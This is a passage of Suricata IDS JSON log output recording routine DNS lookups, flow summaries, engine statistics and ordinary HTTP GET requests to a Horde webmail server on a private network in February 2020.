smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21497,"memcap_state":0,"memcap_global":0},"http":{"memuse":54359,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:09.000660+0000","flow_id":347324023631198,"event_type":"flow","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.716126+0000","end":"2020-02-29T00:15:08.826187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.000688+0000","flow_id":1067809082562313,"event_type":"flow","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:09.186121+0000","end":"2020-02-29T00:15:09.294351+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.002024+0000","flow_id":376680125051247,"event_type":"flow","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.930159+0000","end":"2020-02-29T00:15:09.038527+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.267171+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:20:11.000774+0000","flow_id":1222994856334552,"event_type":"flow","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1167,"bytes_toclient":643,"start":"2020-02-29T00:19:05.218328+0000","end":"2020-02-29T00:19:10.359486+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:13.000141+0000","event_type":"stats","stats":{"uptime":14865,"capture":{"kernel_packets":137255,"kernel_drops":0},"decoder":{"pkts":137258,"bytes":94155456,"invalid":192,"ipv4":135715,"ipv6":10,"ethernet":137258,"raw":0,"null":0,"sll":0,"tcp":130230,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect"
:{"alert":25},"app_layer":{"flow":{"http":1869,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4789,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2469,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:13.001735+0000","flow_id":148136325567662,"event_type":"flow","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:12.611502+0000","end":"2020-02-29T00:15:12.719590+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:13.602993+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62318,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:13.773965+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:20:14.000659+0000","flow_id":1624213506063863,"event_type":"flow","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.425463+0000","end":"2020-02-29T00:15:13.533751+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.000956+0000","flow_id":104855940204179,"event_type":"flow","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.624275+0000","end":"2020-02-29T00:15:13.729610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:20:14.001088+0000","flow_id":978800180569870,"event_type":"flow","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.763662+0000","end":"2020-02-29T00:15:13.872716+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:16.652632+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.662657+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62642,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:16.879486+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:20:16.925711+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.928813+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:20:16.930401+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:20:16.980134+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.980407+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:20:16.982215+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.983390+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:20:16.983592+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:20:17.025464+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:20:17.064556+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:20:17.064917+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:20:18.000801+0000","flow_id":1152402773196756,"event_type":"flow","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":39,"bytes_toserver":4542,"bytes_toclient":40700,"start":"2020-02-29T00:18:55.933844+0000","end":"2020-02-29T00:19:17.296921+0000","age":22,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:18.001075+0000","flow_id":745974314004663,"event_type":"flow","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":10,"bytes_toserver":1862,"bytes_toclient":6621,"start":"2020-02-29T00:19:11.618679+0000","end":"2020-02-29T00:19:17.006675+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:20.000363+0000","event_type":"stats","stats":{"uptime":14872,"capture":{"kernel_packets":137308,"kernel_drops":0},"decoder":{"pkts":137317,"bytes":94179587,"invalid":192,"ipv4":135774,"ipv6":10,"ethernet":137317,"raw":0,"null":0,"sll":0,"tcp":130285,"udp":5282,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2418,"failed_udp":112},"tx":{"http":4797,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2500}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":88884,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:21.601070+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62216,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:21.634801+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:21.808452+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314}} {"timestamp":"2020-02-29T00:20:21.899880+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":5}} {"timestamp":"2020-02-29T00:20:21.902229+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:20:21.987567+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":2}} {"timestamp":"2020-02-29T00:20:26.000487+0000","flow_id":500671536956992,"event_type":"flow","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:24.919104+0000","end":"2020-02-29T00:15:25.027922+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:26.906231+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":6}} 
{"timestamp":"2020-02-29T00:20:27.000216+0000","event_type":"stats","stats":{"uptime":14879,"capture":{"kernel_packets":137323,"kernel_drops":0},"decoder":{"pkts":137344,"bytes":94189208,"invalid":192,"ipv4":135797,"ipv6":10,"ethernet":137344,"raw":0,"null":0,"sll":0,"tcp":130306,"udp":5284,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2419,"failed_udp":112},"tx":{"http":4799,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2501}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} 
